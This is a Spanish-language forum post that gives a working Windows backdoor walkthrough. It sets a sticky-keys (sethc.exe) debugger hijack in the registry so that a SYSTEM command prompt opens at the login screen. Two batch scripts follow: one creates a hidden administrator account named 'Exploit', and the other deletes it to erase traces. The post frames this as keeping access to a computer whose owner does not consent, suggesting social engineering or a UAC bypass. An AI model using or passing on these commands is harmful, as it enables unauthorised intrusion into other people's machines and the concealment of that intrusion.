Como tener siempre acceso a un ordenador.

Iniciado por Sentex, 3 Junio 2017, 22:35 PM

0 Miembros y 1 Visitante están viendo este tema.

Sentex

Hola hoy he descubierto entre comillas como tener acceso a un pc sin cambiar la clave de ningún usuario.

Pasos
1. Necesitas tener privilegios de administrador durante unos segundos y poner este cosigo en una CMD ejecutada con privilegios.
Codigo:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
(Si no puedes tener permisos de administrador porque el dueño de el ordenador no lo consiente intenta ingeniería social o algún BypassUAC)
2. Crear un directorio donde sea con el nombre que quieras con dos .bats uno que es el que hay que ejecutar y el otro es para limpiar huellas.
Codigo 1
@echo off
color 0a
title BaCkDoOr
echo ---------------------------------------------------
echo /\/\/\/\/\/\/\/Apollo Admin Exploit/\/\/\/\/\/\/\/\
echo ---------------------------------------------------
echo Creando nuevo usuario...
net user Exploit /add
echo Usuario creado
echo Dando permisos de administrador...
net localgroup administradores Exploit /add
echo El usuario ha recivido privilegios de administrador
echo Necesita reiniciar el ordenador para que haga efecto.
echo Pulse una tecla para reiniciar.
pause>null
DEL null
shutdown /r -t 00
exit
Codigo 2
@echo off
color 0a
title BaCkDoOr
echo ---------------------------------------------------
echo ===================================================
echo /\/\/\/\/\/\/\/Apollo Admin Exploit/\/\/\/\/\/\/\/\
echo ===================================================
echo ---------------------------------------------------
echo Eliminado usuario..
net user Exploit /delete
echo Usuario eliminado!
echo Eliminando archivos residuales
cd ..
cd C:/Users/
RD /S /Q Exploit
echo Pulse cualquier tecla para reiniciar.
pause>null
del null
shutdown /r -t 00
exit

Estos dos bats necesitan ser ejecutados con permisos de administrador pero eso ya lo habíamos pensado antes verdad  >:D
3. Cerraremos sesión y pulsaremos el Shift 5 veces seguidas y se nos abrirá una cmd con todos los derechos. Lo siguiente sera ir al directorio donde abreis guardado los dos bats y ejecutar el primer bat y luego se reiniciara el pc. Después del reinicio aparecerá un usuario nuevo llamado Exploit iniciaran sesión con todos los privilegios posibles.

4.Disfruten de su acceso pero no apaguen el ordenador cierren sesión y con el mismo proceso para abrir la cmd ejecuten el segundo bat que eliminara el usuario y todos los ficheros para que después del reinicio no quedara nada relacionado con el usuario previamente creado.

Ya se que esto es muy sencillo pero mas vale tenerlo por si nos cambian la contraseña o no la recordamos.

By Apollo.
Preguntas o peticiones en twitter o discord:

Discord: MrSentex#1227
Twitter: @fbi_sentex